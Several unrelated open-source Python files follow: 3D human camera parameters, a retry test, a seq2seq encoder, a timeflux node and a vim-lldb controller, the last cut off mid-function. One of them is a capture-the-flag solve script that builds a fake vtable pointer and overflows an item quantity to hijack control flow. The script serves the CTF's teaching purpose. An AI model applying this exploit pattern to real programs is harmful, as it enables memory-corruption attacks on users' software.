mmhuman3d/core/cameras/camera_parameters.py
|
yl-1993/mmhuman3d
| 472 |
67045
|
import json
import warnings
from enum import Enum
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from mmhuman3d.core.cameras.cameras import PerspectiveCameras
from mmhuman3d.core.conventions.cameras.convert_convention import (
convert_camera_matrix,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
from .builder import build_cameras
_CAMERA_PARAMETER_SUPPORTED_KEYS_ = {
'H': {
'type': int,
},
'W': {
'type': int,
},
'in_mat': {
'type': list,
'len': 3,
},
'rotation_mat': {
'type': list,
'len': 3,
},
'translation': {
'type': list,
'len': 3,
},
'k1': {
'type': float,
},
'k2': {
'type': float,
},
'k3': {
'type': float,
},
'k4': {
'type': float,
},
'k5': {
'type': float,
},
'k6': {
'type': float,
},
'p1': {
'type': float,
},
'p2': {
'type': float,
},
}
class _TypeValidation(Enum):
MATCH = 0
ARRAY = 1
FAIL = 2
class CameraParameter:
logger = None
SUPPORTED_KEYS = _CAMERA_PARAMETER_SUPPORTED_KEYS_
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
_, H = self.validate_item('H', H)
self.parameters_dict['H'] = H
_, W = self.validate_item('W', W)
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self) -> None:
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self) -> np.ndarray:
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
def set_KRT(self,
K_mat: np.ndarray,
R_mat: np.ndarray,
T_vec: np.ndarray,
inverse_extrinsic: bool = False) -> None:
"""Set intrinsic and extrinsic of a camera.
Args:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
inverse_extrinsic (bool, optional):
If true, R_mat and T_vec transform a point
from view to world. Defaults to False.
"""
k_shape = K_mat.shape
assert k_shape[0] == k_shape[1] == 3
r_shape = R_mat.shape
assert r_shape[0] == r_shape[1] == 3
assert T_vec.ndim == 1 and T_vec.shape[0] == 3
self.set_mat_np('in_mat', K_mat)
if inverse_extrinsic:
R_mat = np.linalg.inv(R_mat)
T_vec = -np.dot(R_mat, T_vec).reshape((3))
self.set_mat_np('rotation_mat', R_mat)
self.set_value('translation', T_vec.tolist())
def get_KRT(self, k_dim=3) -> List[np.ndarray]:
"""Get intrinsic and extrinsic of a camera.
Args:
k_dim (int, optional):
Dimension of the returned mat K.
Defaults to 3.
Raises:
ValueError: k_dim is neither 3 nor 4.
Returns:
List[np.ndarray]:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
"""
K_3x3 = self.get_mat_np('in_mat')
R_mat = self.get_mat_np('rotation_mat')
T_vec = np.asarray(self.get_value('translation'))
if k_dim == 3:
return [K_3x3, R_mat, T_vec]
elif k_dim == 4:
K_3x3 = np.expand_dims(K_3x3, 0) # shape (1, 3, 3)
K_4x4 = convert_K_3x3_to_4x4(
K=K_3x3, is_perspective=True) # shape (1, 4, 4)
K_4x4 = K_4x4[0, :, :]
return [K_4x4, R_mat, T_vec]
else:
raise ValueError(f'K mat cannot be converted to {k_dim}x{k_dim}')
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
TypeError:
mat_numpy is not an np.ndarray.
"""
if not isinstance(mat_numpy, np.ndarray):
raise TypeError
self.set_mat_list(mat_key, mat_numpy.tolist())
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
"""
_, mat_list = self.validate_item(mat_key, mat_list)
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
"""
_, value = self.validate_item(key, value)
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> np.ndarray:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
ndarray:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to False.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_kinect_from_smc(self, smc_reader, kinect_id: int) -> None:
"""Load name and parameters of a kinect from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
kinect_id (int):
Id of the target kinect.
"""
name = kinect_id
extrinsics_dict = \
smc_reader.get_kinect_color_extrinsics(
kinect_id, homogeneous=False
)
rot_np = extrinsics_dict['R']
trans_np = extrinsics_dict['T']
intrinsics_np = \
smc_reader.get_kinect_color_intrinsics(
kinect_id
)
resolution = \
smc_reader.get_kinect_color_resolution(
kinect_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
def load_iphone_from_smc(self,
smc_reader,
iphone_id: int = 0,
frame_id: int = 0) -> None:
"""Load name and parameters of an iPhone from an SmcReader instance.
Args:
smc_reader (mmhuman3d.data.data_structures.smc_reader.SMCReader):
An SmcReader instance containing kinect camera parameters.
iphone_id (int):
Id of the target iphone.
Defaults to 0.
frame_id (int):
Frame ID of one selected frame.
It only influences the intrinsics.
Defaults to 0.
"""
name = f'iPhone_{iphone_id}'
extrinsics_mat = \
smc_reader.get_iphone_extrinsics(
iphone_id, homogeneous=True
)
rot_np = extrinsics_mat[:3, :3]
trans_np = extrinsics_mat[:3, 3]
intrinsics_np = \
smc_reader.get_iphone_intrinsics(
iphone_id, frame_id
)
resolution = \
smc_reader.get_iphone_color_resolution(
iphone_id
)
rmatrix = np.linalg.inv(rot_np).reshape(3, 3)
tvec = -np.dot(rmatrix, trans_np)
self.name = name
self.set_mat_np('in_mat', intrinsics_np)
self.set_mat_np('rotation_mat', rmatrix)
self.set_value('translation', tvec.tolist())
self.set_value('H', resolution[1])
self.set_value('W', resolution[0])
@classmethod
def load_from_perspective_cameras(cls,
cam,
name: str,
resolution: Union[List, Tuple] = None):
"""Load parameters from a PerspectiveCameras and return a
CameraParameter.
Args:
cam (mmhuman3d.core.cameras.cameras.PerspectiveCameras):
An instance.
name (str):
Name of this camera.
"""
assert isinstance(cam, PerspectiveCameras
), 'Wrong input, support PerspectiveCameras only!'
if len(cam) > 1:
warnings.warn('Will only use the first camera in the batch.')
cam = cam[0]
resolution = resolution if resolution is not None else cam.resolution[
0].tolist()
height, width = int(resolution[0]), int(resolution[1])
cam_param = CameraParameter()
cam_param.__init__(H=height, W=width, name=name)
k_4x4 = cam.K # shape (1, 4, 4)
r_3x3 = cam.R # shape (1, 3, 3)
t_3 = cam.T # shape (1, 3)
is_perspective = cam.is_perspective()
in_ndc = cam.in_ndc()
k_4x4, r_3x3, t_3 = convert_camera_matrix(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
in_ndc_dst=False,
in_ndc_src=in_ndc,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(k_4x4, is_perspective=is_perspective)
k_3x3 = k_3x3.numpy()[0]
r_3x3 = r_3x3.numpy()[0]
t_3 = t_3.numpy()[0]
cam_param.name = name
cam_param.set_mat_np('in_mat', k_3x3)
cam_param.set_mat_np('rotation_mat', r_3x3)
cam_param.set_value('translation', t_3.tolist())
cam_param.parameters_dict.update(H=height)
cam_param.parameters_dict.update(W=width)
return cam_param
def export_to_perspective_cameras(self) -> PerspectiveCameras:
"""Export to a opencv defined screen space PerspectiveCameras.
Returns:
Same defined PerspectiveCameras of batch_size 1.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4, rotation, translation = self.get_KRT(k_dim=4)
k_4x4 = np.expand_dims(k_4x4, 0) # shape (1, 3, 3)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K = torch.from_numpy(k_4x4)
new_R = torch.from_numpy(rotation)
new_T = torch.from_numpy(translation)
cam = build_cameras(
dict(
type='PerspectiveCameras',
K=new_K.float(),
R=new_R.float(),
T=new_T.float(),
convention='opencv',
in_ndc=False,
resolution=(height, width)))
return cam
def validate_item(self, key: Any, val: Any) -> List:
"""Check whether the key and its value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
TypeError:
Value's type doesn't match definition.
Returns:
key (Any): The input key.
val (Any): The value casted into correct format.
"""
self.__check_key__(key)
formatted_val = self.__validate_value_type__(key, val)
return key, formatted_val
def __check_key__(self, key: Any) -> None:
"""Check whether the key matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
Raises:
KeyError:
key cannot be found in
CameraParameter.SUPPORTED_KEYS.
"""
if key not in self.__class__.SUPPORTED_KEYS:
err_msg = 'Key check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
raise KeyError(err_msg)
def __validate_value_type__(self, key: Any, val: Any) -> Any:
"""Check whether the type of value matches definition in
CameraParameter.SUPPORTED_KEYS.
Args:
key (Any):
Key in CameraParameter.
val (Any):
Value to the key.
Raises:
TypeError:
Value is supported but doesn't match definition.
Returns:
val (Any): The value casted into correct format.
"""
np_type_mapping = {int: np.integer, float: np.floating}
supported_keys = self.__class__.SUPPORTED_KEYS
validation_result = _TypeValidation.FAIL
ret_val = None
if supported_keys[key]['type'] == int or\
supported_keys[key]['type'] == float:
type_str = str(type(val))
class_name = type_str.split('\'')[1]
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
elif class_name.startswith('numpy'):
# a value is required, not array
if np.issubdtype(
type(val),
np_type_mapping[supported_keys[key]['type']]):
validation_result = _TypeValidation.MATCH
ret_val = val.astype(supported_keys[key]['type'])
elif np.issubdtype(type(val), np.ndarray):
validation_result = _TypeValidation.ARRAY
elif class_name.startswith('torch'):
# only one element tensors
# can be converted to Python scalars
if len(val.size()) == 0:
val_item = val.item()
if type(val_item) == supported_keys[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val_item
else:
validation_result = _TypeValidation.ARRAY
else:
if type(val) == self.__class__.SUPPORTED_KEYS[key]['type']:
validation_result = _TypeValidation.MATCH
ret_val = val
if validation_result != _TypeValidation.MATCH:
err_msg = 'Type check failed in CameraParameter:\n'
err_msg += f'key={str(key)}\n'
err_msg += f'type(val)={type(val)}\n'
if validation_result == _TypeValidation.ARRAY:
err_msg += 'A single value is expected, ' +\
'neither an array nor a slice.\n'
raise TypeError(err_msg)
return ret_val
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
"""Parse a dict loaded from chessboard file into another dict needed by
CameraParameter.
Args:
chessboard_camera_param (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to True.
Returns:
dict:
A dict of parameters in CameraParameter.to_dict() format.
"""
camera_param_dict = {}
camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
camera_param_dict['in_mat'] = chessboard_camera_param['K']
camera_param_dict['k1'] = 0
camera_param_dict['k2'] = 0
camera_param_dict['k3'] = 0
camera_param_dict['k4'] = 0
camera_param_dict['k5'] = 0
camera_param_dict['p1'] = 0
camera_param_dict['p2'] = 0
camera_param_dict['name'] = name
camera_param_dict['rotation'] = chessboard_camera_param['R']
camera_param_dict['translation'] = chessboard_camera_param['T']
if inverse:
rmatrix = np.linalg.inv(
np.array(camera_param_dict['rotation']).reshape(3, 3))
camera_param_dict['rotation'] = rmatrix.tolist()
tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
tvec = -np.dot(rmatrix, tmatrix)
camera_param_dict['translation'] = tvec.reshape((3)).tolist()
return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
"""Return a zero mat in list format.
Args:
n (int, optional):
Length of the edge.
Defaults to 3.
Returns:
list:
List[List[int]]
"""
ret_list = [[0] * n for _ in range(n)]
return ret_list
|
modules/dbnd/src/dbnd/_vendor/tenacity/tests/test_tornado.py
|
busunkim96/dbnd
| 224 |
67051
|
<reponame>busunkim96/dbnd
# coding: utf-8
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from dbnd._vendor.tenacity import retry
from dbnd._vendor.tenacity import tornadoweb
from dbnd._vendor.tenacity.tests.test_tenacity import NoIOErrorAfterCount
from tornado import gen
from tornado import testing
@retry
@gen.coroutine
def _retryable_coroutine(thing):
yield gen.sleep(0.00001)
thing.go()
class TestTornado(testing.AsyncTestCase):
@testing.gen_test
def test_retry(self):
assert gen.is_coroutine_function(_retryable_coroutine)
thing = NoIOErrorAfterCount(5)
yield _retryable_coroutine(thing)
assert thing.counter == thing.count
def test_repr(self):
repr(tornadoweb.TornadoRetrying())
def test_old_tornado(self):
old_attr = gen.is_coroutine_function
try:
del gen.is_coroutine_function
# is_coroutine_function was introduced in tornado 4.5;
# verify that we don't *completely* fall over on old versions
@retry
def retryable(thing):
pass
finally:
gen.is_coroutine_function = old_attr
if __name__ == '__main__':
unittest.main()
|
pwnables/rusty_shop/solve.py
|
cclauss/fbctf-2019-challenges
| 213 |
67067
|
from pwn import *
# Create item
print('1')
FUNC = 0x701e40
#FUNC = 0x41414141 + 0x18
vtable_ptr = FUNC-0x18
print(p64(vtable_ptr) * 8) # name - pointer to fake vtable
print('bob') # description
print('1.23') # price
# Add item to basket
print('4')
print('1') # second item, added above
print('288230376151711745') # quantity - (2**64 / 64) + 1
# Check out
print('6')
|
open_seq2seq/encoders/encoder.py
|
VoiceZen/OpenSeq2Seq
| 1,459 |
67076
|
# Copyright (c) 2018 NVIDIA Corporation
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import abc
import copy
import six
import tensorflow as tf
from open_seq2seq.optimizers.mp_wrapper import mp_regularizer_wrapper
from open_seq2seq.utils.utils import check_params, cast_types
@six.add_metaclass(abc.ABCMeta)
class Encoder:
"""Abstract class from which all encoders must inherit.
"""
@staticmethod
def get_required_params():
"""Static method with description of required parameters.
Returns:
dict:
Dictionary containing all the parameters that **have to** be
included into the ``params`` parameter of the
class :meth:`__init__` method.
"""
return {}
@staticmethod
def get_optional_params():
"""Static method with description of optional parameters.
Returns:
dict:
Dictionary containing all the parameters that **can** be
included into the ``params`` parameter of the
class :meth:`__init__` method.
"""
return {
'regularizer': None, # any valid TensorFlow regularizer
'regularizer_params': dict,
'initializer': None, # any valid TensorFlow initializer
'initializer_params': dict,
'dtype': [tf.float32, tf.float16, 'mixed'],
}
def __init__(self, params, model, name="encoder", mode='train'):
"""Encoder constructor.
Note that encoder constructors should not modify TensorFlow graph, all
graph construction should happen in the :meth:`self._encode() <_encode>`
method.
Args:
params (dict): parameters describing the encoder.
All supported parameters are listed in :meth:`get_required_params`,
:meth:`get_optional_params` functions.
model (instance of a class derived from :class:`Model<models.model.Model>`):
parent model that created this encoder.
Could be None if no model access is required for the use case.
name (str): name for encoder variable scope.
mode (str): mode encoder is going to be run in.
Could be "train", "eval" or "infer".
Config parameters:
* **initializer** --- any valid TensorFlow initializer. If no initializer
is provided, model initializer will be used.
* **initializer_params** (dict) --- dictionary that will be passed to
initializer ``__init__`` method.
* **regularizer** --- and valid TensorFlow regularizer. If no regularizer
is provided, model regularizer will be used.
* **regularizer_params** (dict) --- dictionary that will be passed to
regularizer ``__init__`` method.
* **dtype** --- model dtype. Could be either ``tf.float16``, ``tf.float32``
or "mixed". For details see
:ref:`mixed precision training <mixed_precision>` section in docs. If no
dtype is provided, model dtype will be used.
"""
check_params(params, self.get_required_params(), self.get_optional_params())
self._params = copy.deepcopy(params)
self._model = model
if 'dtype' not in self._params:
if self._model:
self._params['dtype'] = self._model.params['dtype']
else:
self._params['dtype'] = tf.float32
self._name = name
self._mode = mode
self._compiled = False
def encode(self, input_dict):
"""Wrapper around :meth:`self._encode() <_encode>` method.
Here name, initializer and dtype are set in the variable scope and then
:meth:`self._encode() <_encode>` method is called.
Args:
input_dict (dict): see :meth:`self._encode() <_encode>` docs.
Returns:
see :meth:`self._encode() <_encode>` docs.
"""
if not self._compiled:
if 'regularizer' not in self._params:
if self._model and 'regularizer' in self._model.params:
self._params['regularizer'] = copy.deepcopy(
self._model.params['regularizer']
)
self._params['regularizer_params'] = copy.deepcopy(
self._model.params['regularizer_params']
)
if 'regularizer' in self._params:
init_dict = self._params.get('regularizer_params', {})
if self._params['regularizer'] is not None:
self._params['regularizer'] = self._params['regularizer'](**init_dict)
if self._params['dtype'] == 'mixed':
self._params['regularizer'] = mp_regularizer_wrapper(
self._params['regularizer'],
)
if self._params['dtype'] == 'mixed':
self._params['dtype'] = tf.float16
if 'initializer' in self.params:
init_dict = self.params.get('initializer_params', {})
initializer = self.params['initializer'](**init_dict)
else:
initializer = None
self._compiled = True
with tf.variable_scope(self._name, initializer=initializer,
dtype=self.params['dtype']):
return self._encode(self._cast_types(input_dict))
def _cast_types(self, input_dict):
"""This function performs automatic cast of all inputs to encoder dtype.
Args:
input_dict (dict): dictionary passed to :meth:`self._encode() <_encode>`
method.
Returns:
dict: same as input_dict, but with all Tensors cast to encoder dtype.
"""
return cast_types(input_dict, self.params['dtype'])
@abc.abstractmethod
def _encode(self, input_dict):
"""This is the main function which should construct encoder graph.
Typically, encoder will take raw input sequence as an input and
produce some hidden representation as an output.
Args:
input_dict (dict): dictionary containing encoder inputs.
If the encoder is used with :class:`models.encoder_decoder` class,
``input_dict`` will have the following content::
{
"source_tensors": data_layer.input_tensors['source_tensors']
}
Returns:
dict:
dictionary of encoder outputs. Return all necessary outputs.
Typically this will be just::
{
"outputs": outputs,
"state": state,
}
"""
pass
@property
def params(self):
"""Parameters used to construct the encoder (dictionary)."""
return self._params
@property
def mode(self):
"""Mode encoder is run in."""
return self._mode
@property
def name(self):
"""Encoder name."""
return self._name
|
timeflux/nodes/sequence.py
|
HerySon/timeflux
| 123 |
67083
|
"""timeflux.nodes.sequence: generate a sequence"""
from timeflux.core.node import Node
class Sequence(Node):
def __init__(self):
"""Generate a sequence"""
self._current = 0
def update(self):
self.o.set([self._current])
self._current += 1
|
utils/vim-lldb/python-vim-lldb/lldb_controller.py
|
nathawes/swift-lldb
| 427 |
67085
|
#
# This file defines the layer that talks to lldb
#
import os
import re
import sys
import lldb
import vim
from vim_ui import UI
# =================================================
# Convert some enum value to its string counterpart
# =================================================
# Shamelessly copy/pasted from lldbutil.py in the test suite
def state_type_to_str(enum):
"""Returns the stateType string given an enum."""
if enum == lldb.eStateInvalid:
return "invalid"
elif enum == lldb.eStateUnloaded:
return "unloaded"
elif enum == lldb.eStateConnected:
return "connected"
elif enum == lldb.eStateAttaching:
return "attaching"
elif enum == lldb.eStateLaunching:
return "launching"
elif enum == lldb.eStateStopped:
return "stopped"
elif enum == lldb.eStateRunning:
return "running"
elif enum == lldb.eStateStepping:
return "stepping"
elif enum == lldb.eStateCrashed:
return "crashed"
elif enum == lldb.eStateDetached:
return "detached"
elif enum == lldb.eStateExited:
return "exited"
elif enum == lldb.eStateSuspended:
return "suspended"
else:
raise Exception("Unknown StateType enum")
class StepType:
INSTRUCTION = 1
INSTRUCTION_OVER = 2
INTO = 3
OVER = 4
OUT = 5
class LLDBController(object):
""" Handles Vim and LLDB events such as commands and lldb events. """
# Timeouts (sec) for waiting on new events. Because vim is not multi-threaded, we are restricted to
# servicing LLDB events from the main UI thread. Usually, we only process events that are already
# sitting on the queue. But in some situations (when we are expecting an event as a result of some
# user interaction) we want to wait for it. The constants below set these wait period in which the
# Vim UI is "blocked". Lower numbers will make Vim more responsive, but LLDB will be delayed and higher
# numbers will mean that LLDB events are processed faster, but the Vim UI may appear less responsive at
# times.
eventDelayStep = 2
eventDelayLaunch = 1
eventDelayContinue = 1
def __init__(self):
""" Creates the LLDB SBDebugger object and initializes the UI class. """
self.target = None
self.process = None
self.load_dependent_modules = True
self.dbg = lldb.SBDebugger.Create()
self.commandInterpreter = self.dbg.GetCommandInterpreter()
self.ui = UI()
def completeCommand(self, a, l, p):
""" Returns a list of viable completions for command a with length l and cursor at p """
assert l[0] == 'L'
# Remove first 'L' character that all commands start with
l = l[1:]
# Adjust length as string has 1 less character
p = int(p) - 1
result = lldb.SBStringList()
num = self.commandInterpreter.HandleCompletion(l, p, 1, -1, result)
if num == -1:
# FIXME: insert completion character... what's a completion
# character?
pass
elif num == -2:
# FIXME: replace line with result.GetStringAtIndex(0)
pass
if result.GetSize() > 0:
results = filter(None, [result.GetStringAtIndex(x)
for x in range(result.GetSize())])
return results
else:
return []
def doStep(self, stepType):
""" Perform a step command and block the UI for eventDelayStep seconds in order to process
events on lldb's event queue.
FIXME: if the step does not complete in eventDelayStep seconds, we relinquish control to
the main thread to avoid the appearance of a "hang". If this happens, the UI will
update whenever; usually when the user moves the cursor. This is somewhat annoying.
"""
if not self.process:
sys.stderr.write("No process to step")
return
t = self.process.GetSelectedThread()
if stepType == StepType.INSTRUCTION:
t.StepInstruction(False)
if stepType == StepType.INSTRUCTION_OVER:
t.StepInstruction(True)
elif stepType == StepType.INTO:
t.StepInto()
elif stepType == StepType.OVER:
t.StepOver()
elif stepType == StepType.OUT:
t.StepOut()
self.processPendingEvents(self.eventDelayStep, True)
def doSelect(self, command, args):
""" Like doCommand, but suppress output when "select" is the first argument."""
a = args.split(' ')
return self.doCommand(command, args, "select" != a[0], True)
def doProcess(self, args):
""" Handle 'process' command. If 'launch' is requested, use doLaunch() instead
of the command interpreter to start the inferior process.
"""
a = args.split(' ')
if len(args) == 0 or (len(a) > 0 and a[0] != 'launch'):
self.doCommand("process", args)
#self.ui.update(self.target, "", self)
else:
self.doLaunch('-s' not in args, "")
def doAttach(self, process_name):
""" Handle process attach. """
error = lldb.SBError()
self.processListener = lldb.SBListener("process_event_listener")
self.target = self.dbg.CreateTarget('')
self.process = self.target.AttachToProcessWithName(
self.processListener, process_name, False, error)
if not error.Success():
sys.stderr.write("Error during attach: " + str(error))
return
self.ui.activate()
self.pid = self.process.GetProcessID()
print "Attached to %s (pid=%d)" % (process_name, self.pid)
def doDetach(self):
if self.process is not None and self.process.IsValid():
pid = self.process.GetProcessID()
state = state_type_to_str(self.process.GetState())
self.process.Detach()
self.processPendingEvents(self.eventDelayLaunch)
def doLaunch(self, stop_at_entry, args):
""" Handle process launch. """
error = lldb.SBError()
fs = self.target.GetExecutable()
exe = os.path.join(fs.GetDirectory(), fs.GetFilename())
if self.process is not None and self.process.IsValid():
pid = self.process.GetProcessID()
state = state_type_to_str(self.process.GetState())
self.process.Destroy()
launchInfo = lldb.SBLaunchInfo(args.split(' '))
self.process = self.target.Launch(launchInfo, error)
if not error.Success():
sys.stderr.write("Error during launch: " + str(error))
return
# launch succeeded, store pid and add some event listeners
self.pid = self.process.GetProcessID()
self.processListener = lldb.SBListener("process_event_listener")
self.process.GetBroadcaster().AddListener(
self.processListener, lldb.SBProcess.eBroadcastBitStateChanged)
print "Launched %s %s (pid=%d)" % (exe, args, self.pid)
if not stop_at_entry:
self.doContinue()
else:
self.processPendingEvents(self.eventDelayLaunch)
def doTarget(self, args):
""" Pass target command to interpreter, except if argument is not one of the valid options, or
is create, in which case try to create a target with the argument as the executable. For example:
target list ==> handled by interpreter
target create blah ==> custom creation of target 'blah'
target blah ==> also creates target blah
"""
target_args = [ # "create",
"delete",
"list",
"modules",
"select",
"stop-hook",
"symbols",
"variable"]
a = args.split(' ')
if len(args) == 0 or (len(a) > 0 and a[0] in target_args):
self.doCommand("target", args)
return
elif len(a) > 1 and a[0] == "create":
exe = a[1]
elif len(a) == 1 and a[0] not in target_args:
exe = a[0]
err = lldb.SBError()
self.target = self.dbg.CreateTarget(
exe, None, None, self.load_dependent_modules, err)
if not self.target:
sys.stderr.write(
"Error creating target %s. %s" %
(str(exe), str(err)))
return
self.ui.activate()
self.ui.update(self.target, "created target %s" % str(exe), self)
def doContinue(self):
""" Handle 'contiue' command.
FIXME: switch to doCommand("continue", ...) to handle -i ignore-count param.
"""
if not self.process or not self.process.IsValid():
sys.stderr.write("No process to continue")
return
self.process.Continue()
self.processPendingEvents(self.eventDelayContinue)
def doBreakpoint(self, args):
""" Handle breakpoint command with command interpreter, except if the user calls
"breakpoint" with no other args, in which case add a breakpoint at the line
under the cursor.
"""
a = args.split(' ')
if len(args) == 0:
show_output = False
# User called us with no args, so toggle the bp under cursor
cw = vim.current.window
cb = vim.current.buffer
name = cb.name
line = cw.cursor[0]
# Since the UI is responsbile for placing signs at bp locations, we have to
# ask it if there already is one or more breakpoints at (file,
# line)...
if self.ui.haveBreakpoint(name, line):
bps = self.ui.getBreakpoints(name, line)
args = "delete %s" % " ".join([str(b.GetID()) for b in bps])
self.ui.deleteBreakpoints(name, line)
else:
args = "set -f %s -l %d" % (name, line)
else:
show_output = True
self.doCommand("breakpoint", args, show_output)
return
def doRefresh(self):
""" process pending events and update UI on request """
status = self.processPendingEvents()
def doShow(self, name):
""" handle :Lshow <name> """
if not name:
self.ui.activate()
return
if self.ui.showWindow(name):
self.ui.update(self.target, "", self)
def doHide(self, name):
""" handle :Lhide <name> """
if self.ui.hideWindow(name):
self.ui.update(self.target, "", self)
def doExit(self):
self.dbg.Terminate()
self.dbg = None
def getCommandResult(self, command, command_args):
""" Run cmd in the command interpreter and returns (success, output) """
result = lldb.SBCommandReturnObject()
cmd = "%s %s" % (command, command_args)
self.commandInterpreter.HandleCommand(cmd, result)
return (result.Succeeded(), result.GetOutput()
if result.Succeeded() else result.GetError())
def doCommand(
self,
command,
